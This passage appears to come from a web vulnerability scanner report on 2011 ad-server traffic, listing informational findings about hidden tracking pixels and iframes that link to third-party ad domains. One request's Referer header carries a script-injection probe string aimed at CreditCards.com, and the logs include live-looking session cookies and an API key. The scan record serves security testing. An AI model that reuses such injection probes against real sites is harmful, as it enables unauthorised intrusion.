http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308226506458&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860

The response contains the following links to other domains:

http://map.media6degrees.com/orbserv/hbpix?pixId=3949&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=304&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
http://www.wtp101.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=485&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1308226506458&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; __qca=P0-1342016851-1308225219551

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1736
Content-Type: text/html
Date: Thu, 16 Jun 2011 12:15:05 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<img width="0" height="0" src="http://map.media6degrees.com/orbserv/hbpix?pixId=3949&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=304&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

<img width="0" height="0" src="http://www.wtp101.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=485&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

</div>
...[SNIP]...

15.84. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308226815761&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860

The response contains the following links to other domains:

http://adadvisor.net/adscores/g.pixel?sid=9223635428&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=1&admeld_callback=http://tag.admeld.com/pixel
http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match
http://sync.mathtag.com/sync?mt_exid=2&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1308226815761&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; __qca=P0-1342016851-1308225219551

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1970
Content-Type: text/html
Date: Thu, 16 Jun 2011 12:20:14 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<script type="text/javascript" src="http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>

<img width="0" height="0" src="http://sync.mathtag.com/sync?mt_exid=2&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

<img width="0" height="0" src="http://adadvisor.net/adscores/g.pixel?sid=9223635428&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=1&admeld_callback=http://tag.admeld.com/pixel"/>

</div>
...[SNIP]...

15.85. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308226189910&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860

The response contains the following links to other domains:

http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel
http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match
http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1308226189910&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; __qca=P0-1342016851-1308225219551

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2108
Content-Type: text/html
Date: Thu, 16 Jun 2011 12:09:53 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel"></script>

<script type="text/javascript" src="http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match"></iframe>
...[SNIP]...

15.86. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/728x90/atf

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308226814384&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860

The response contains the following links to other domains:

http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel
http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match
http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/677/cnbc/728x90/atf?t=1308226814384&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; __qca=P0-1342016851-1308225219551

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2090
Content-Type: text/html
Date: Thu, 16 Jun 2011 12:20:13 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:728px;height:90px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel"></script>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match"></iframe>

<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...

15.87. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/728x90/atf

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308227124764&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860

The response contains the following links to other domains:

http://am.nexac.com/match?user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=5
http://api.bizographics.com/v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4
http://tags.bluekai.com/site/3561?id=d96a784e-8901-47de-9dd1-4f91acb31514&redir=http%3A%2F%2Ftag.admeld.com%2Fpixel%3Fadmeld_dataprovider_id%3D21%26external_user_id%3D%24BK_UUID%26_m%3D1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=21&admeld_callback=http://tag.admeld.com/pixel

Request

GET /ad/iframe/677/cnbc/728x90/atf?t=1308227124764&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; __qca=P0-1342016851-1308225219551

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2063
Content-Type: text/html
Date: Thu, 16 Jun 2011 12:25:24 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:728px;height:90px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<img style="display:none" width="1" height="1" src="http://am.nexac.com/match?user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=5"/>

<img style="display:none" width="1" height="1" src="http://api.bizographics.com/v1/profile.redirect?api_key=8dn4jnyemg4ky9svqgs28wds&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&callback_url=http%3A%2F%2Ftag%2Eadmeld%2Ecom%2Fpixel%3Fadmeld%5Fdataprovider%5Fid%3D4"/>

<img width="0" height="0" src="http://tags.bluekai.com/site/3561?id=d96a784e-8901-47de-9dd1-4f91acb31514&redir=http%3A%2F%2Ftag.admeld.com%2Fpixel%3Fadmeld_dataprovider_id%3D21%26external_user_id%3D%24BK_UUID%26_m%3D1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=21&admeld_callback=http://tag.admeld.com/pixel"/>

</div>
...[SNIP]...

15.88. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/728x90/atf

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308227437416&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860

The response contains the following links to other domains:

http://map.media6degrees.com/orbserv/hbpix?pixId=3949&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=304&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
http://pbid.pro-market.net/engine?site=124915;size=1x1;mimetype=img&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=12&admeld_callback=http://tag.admeld.com/pixel

Request

GET /ad/iframe/677/cnbc/728x90/atf?t=1308227437416&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514; D41U=3JkLECgnfCV4RSdK7MWND7_rhgf6thkqbeD86xb6IQ8zLVGobIg0cWA; __qca=P0-1342016851-1308225219551

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1806
Content-Type: text/html
Date: Thu, 16 Jun 2011 12:30:36 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:728px;height:90px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<img width="0" height="0" src="http://map.media6degrees.com/orbserv/hbpix?pixId=3949&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=304&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match"/>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://pbid.pro-market.net/engine?site=124915;size=1x1;mimetype=img&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=12&admeld_callback=http://tag.admeld.com/pixel"></iframe>
...[SNIP]...

15.89. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The page was loaded from a URL containing a query string:

http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&phint=__bk_t%3DInstant%20Approval%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&limit=4&r=19073814

The response contains the following links to other domains:

http://ad.yieldmanager.com/pixel?adv=60652&code=AS12330&t=2&rnd=626795047
http://ads.bluelithium.com/pixel?adv=23351&code=BK12330&t=2&rnd=5932487
http://segment-pixel.invitemedia.com/pixel?pixelID=14125&partnerID=84&key=segment
http://view.atdmt.com/action/vncbk_poc/v3/bk.7QIxOPRH99egMNJB&

Request

GET /site/2939?ret=html&phint=keywords%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&phint=__bk_t%3DInstant%20Approval%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DInstant%20Approval%20Credit%20Cards%2C%20guaranteed%20approval%20credit%20cards%2C%20credit%20card%2C%200%25%2C%20low%20apr%2C%20apply%2C%20online%2C%20rate%2C%20credit%20card%20applications%2C%20application&limit=4&r=19073814 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/instant-approval.php?425aa%27%3E%3Cscript%3Ealert(%22BlindSQLInjection%22)%3C/script%3Eaaa9c6466f9=1
Cookie: bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bk=2hpl98rL0+zBvF/1; bkc=KJh56gkn9NWxOFeFrSnZ6eXQiXcY/hWavXAOQHuVWjWGaGG/GMjVQGPHYWxne6xqfuyWv0WV3PP//VJojtc7aHHJRD91iM1qU2h8h5F5cpF4Fs1lTy1v+LJhoJo3QWvsdB1AwqX1T5TObqeCwk+bLkcSygInYMQn9OKCSGGKcKzBzNbfZ6jiePQvN4nLzSd6ZscmSlIN9PBlY3+dd5QECM7FBrKNyl8QSNGCIasoKXsV7Mw1KKNNtFd7QXJGfgUr8tqoRHorzNffQ98FJxRL+o5uarJK5MA3dVCT4NObppelN0fEl75Gw5z5JVzI+kVOX/CwZFwSJdxrN3Jy8UnW1B5gONFodnLDXibd6D5pZIrNjIC0+961HP2GFzGhF2zr67gXHuOn5FT4zL/7p4USoIHY9DifcBIx87g+ufvcIL55FrZU87g+qdgI2fLvb4z7IFXXMQ126gK56LkBYeFpA0t0Cd34c2q1d5ZpmKkAPogFtgXe+B/p; bko=KJyf0Xl9X1Ui+0XMQhy4MBUW9VBBC1r3Xp/yn9v0VOkiOuWLHQjkBCMgBOK1BxA3hLSQY+UOhc9c0wJg4QNAJxJjrq/FQKgiCs9LVSY2/KIK9VDkGuhsOQ9oH04R; bkw5=KJh2Ag2n9ZWRhfd7kUjSTHuiu6H3dQQ+WA0y+ms/6psGvR3AhQC30uD03gd9aJrf3SZko53iLqaJvsoGiOgYnK+8fMNTgXUk4KdKfdF2wndKuCM9Q/ActL/TuQ9v3g8RsgiRGvmQYu2+YqHEgsMKZpmQsbzMqy+5OUOMEj5vmXsKorDjyFZDPabEy/JZRoDX/IC19l6DJhZYcSl3iNFgPDiOJ0Doy0MmuWGrJuizfEMr1g6GAdHNuc5gviVnHWjDhLGEWDavA7/JRiLgSpfmY/U8Rdi6aKS4moHH4eQXTup7NWnWO4HMttYkg7fB9MaqTjGNfJciGM3vOdE7g5H/phW1eRroXYK+wTwO3//5PgxZFrkRh4vXjOo8bUc2XNpZjPDOF1pJlcUnlfOFmp67OV9pRvJi7q6UC/zSCQN55JGpXmBV8tMmf+fgT+NzIdQBfmG0VZKHU6zEMhftvYD8wzmx6TF9RduS7o2XXnDLiQgPxPAFizQaBlKNSXCJnJDalhdk0mk0ndbF5qKJaH4p7XrXN+DlbgeGzNl5oh7X9uqEK3y=; bkst=KJhBMqNvx6WxCSz/Yw8DoCwWy7jQjtztrTFPJDkCx1WgYi7MlqtawNzxx6Q7bJ1/+MbO/ai/oRICtBMqmBT67F/fcI56TsAjR9ZZpPkpmVFryX2KO8TP5SWG6YhYAzZq/BqFh9d+UfE4OoIokZxBEA/+vYRhhCxX23gSi7ev6j3qN7dd4fadIbUGV2WbLw1zG3WxGMBWDu0dqUN34q4020Yo1+qSMJygxZj03cnYVnLEaFaZTgCL8hfDlTOI1EyzM3xSI9LbTw7PfgxLEf7Ge4g0tL8rgQsLxCTpAjL4czdmghIPdynRhWvD; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101x8L4r6n9W5cOkz=; bklc=4dfb2873; bkdc=res

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:22:54 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=j+g8ULcsd86BvF/1; expires=Wed, 14-Dec-2011 11:22:54 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56Mkn9NWxOdedz6UBGHXQyVeCaPsyAixnQHuVWjWGaGGWHstLO9rMW/QVcGQttkA/PA/LD3rxxLEupLnmv0iuyG9Ras4VFnMpigKfwljZlMDjcN9/vChc3AAnYC70E8w6devWIySkyTqfQ2JEM5/VdkNDyaA9rmi+Jr7Ez5Ty8t+l6TiF9DFAOLo7ElikhyNpFFjUspO2ofOS3XKKB1p8q7mI5+Qwq16GCeT35uXWoKz1zfftmrldX6aCnw5S2lmp29QB+pk4IT9mq0DsnnSUbwhLnfLzkUT6FeXAFVKRbtrUSKXf+JfgMo/pc2r3xcMDJXl8ti46n2SizmP0heecST5Sb40faw/rF2skrzlhtZkbcs6ey2WUoldu+4fxn+JbdWDQulqbChpluUmX2iZ8D9Oun+Lq6C0F4D7tDclq8jLOSRfUd3qfF22Pun6dD428c95bosXfoHmqWcqZJN+Ae2DdwdypNt4w83xEVVkISdXY/HEumy==; expires=Wed, 14-Dec-2011 11:22:54 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJyf0Xl9X1Ui+0XMQhy49ym48V24JGRZeCCg/khV7jKORHsxhzGxvyCC1E/GLXaRofkQgWkLWnlLevoxcDy15T9LFIqUxaRiAJDgIhvGnAT/ho/atCF0fCkxPCnvRZx99OG+JUT=; expires=Wed, 14-Dec-2011 11:22:54 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMR5Mehze9pkYSk8tUU8bl0mvlnyFe43YxY/mMGbTOOOCSsCrSsNiRsJkqVfT90CXY03LyZvzSooZAsO7GJk3AZKiSsvxRbN3ZVJMgZiV7sjZRsvKAVCGjB/ePU6Yty3d8BPeG9NO/Z1cRNBpRy+n961nY6+E96Beuh1MTC1JnGcxnBXQsA8HA901MGNH5T2HAxNNMR6BEUSeiaalnBB1ARh1EzTBWDI1QLcanQK3ksjy5URB5FD0uUzhpexmBvTLXuTmYLGy5pP0zERbOMjUMjVeQRDiBBeR6Bv61euFwvPAcagzVxc/Q7IPFUyegxAKJ; expires=Wed, 14-Dec-2011 11:22:54 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJh2DgXFxNWRwSXwNPKAQTi6iTQVqSDkZkuE6A3X0BBHyixSeSB/VcHOOU2OSVgtJoBah/2BMWjEAy3exRi/E4ZI58Fzj2eklF4rrK5X8dFmp4GO+J3TGb6wt0a9x5T52QW8sIncqC6jM9/79lEABScHaA/kyGCnrpGWSAWb6L3GvD9na7VJPWn1vPZz5CywuIxoeW0bEYyxoy+4/6OElRsGk7zcg4U1oX9jAuG5u/2vkDHW3/QIqZvBP/qGST4rakx0iNO15wRdyLyc3QPYyrEui8VT71jKEYOzrH5FzE7O9hFuQNzqhh27+tDWcW9pPQNsirgfseORHlQSnZyxT39m6NF6oIDvCY5/eWKVoLv4+cblK4LPgecivrsEMkU1EDCB/0A8MMIz6bEL3CrwT2vfqFswbg4+7w6DLBh+/ZK5FSxWCySsM07jqyYUropKAifuRVXKUmFLy8f/gufKtgZqlXtbn7NXE4mnvrcK0HhkHijrsenh9JhsGXx2h/mfqvZGDs63tHkHm5UYXbTj1313/83JErrPU2QTLhkHt5ww73vjHoPdgnLkperTzMUeSNa2okHWBAPNAlnfOuA9irQ=; expires=Wed, 14-Dec-2011 11:22:54 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 18-Jun-2011 11:22:54 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 548
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BK12330&t=2&rnd=5932487" width=1 height=1 border=0 alt="">
<img src="http://ad.yieldmanager.com/pixel?adv=60652&code=AS12330&t=2&rnd=626795047" width=1 height=1 border=0 alt="">
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=14125&partnerID=84&key=segment" width=1 height=1 border=0 alt="">
<img src="http://view.atdmt.com/action/vncbk_poc/v3/bk.7QIxOPRH99egMNJB&" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...

